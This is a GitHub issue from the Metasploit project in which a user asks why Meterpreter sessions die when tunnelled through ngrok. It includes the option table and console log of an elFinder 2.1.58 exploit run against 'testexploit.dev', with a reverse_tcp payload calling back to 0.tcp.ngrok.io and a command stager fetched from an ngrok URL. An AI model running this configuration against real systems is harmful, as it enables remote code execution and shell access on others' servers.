metasploit-framework icon indicating copy to clipboard operation
metasploit-framework copied to clipboard

Published 20 hours ago verified publisher icon rapid7

Ngrok : Meterpreter session not valid and dies.

Open xhat007 opened this issue 2 years ago • 0 comments

I started a ngrok tcp tunnel on port 3333. I've set ReverseListenerBindAddress 127.0.0.1 and ReverseListenerBindPort 3333

after the exploit succeed the Meterpreter session dies.

Any help will be appreciated, Thank you.

Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     testexploit.dev  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    10000            yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /elfinder/       yes       The URI of elFinder
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  0.tcp.ngrok.io   yes       The listen address (an interface may be specified)
   LPORT  10000             yes       The listen port

[*] Started reverse TCP handler on 127.0.0.1:3333
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. elFinder running version 2.1.58
[*] Uploading file vgIcayCc.txt to elFinder
[+] Text file was successfully uploaded!
[*] Attempting to create archive iFAId.zip
[+] Archive was successfully created!
[*] Using URL: http://0.tcp.ngrok.io:10000/OI23oypnxxq
[*] Sending stage (989032 bytes) to 127.0.0.1
[*] Command Stager progress -  53.45% done (62/116 bytes)
[*] Command Stager progress -  72.41% done (84/116 bytes)
[*] Command Stager progress -  83.62% done (97/116 bytes)
[*] Command Stager progress - 100.00% done (116/116 bytes)
[-] Meterpreter session 7 is not valid and will be closed
[*] testexploit.dev - Meterpreter session 7 closed.

xhat007 avatar Aug 10 '22 15:08 xhat007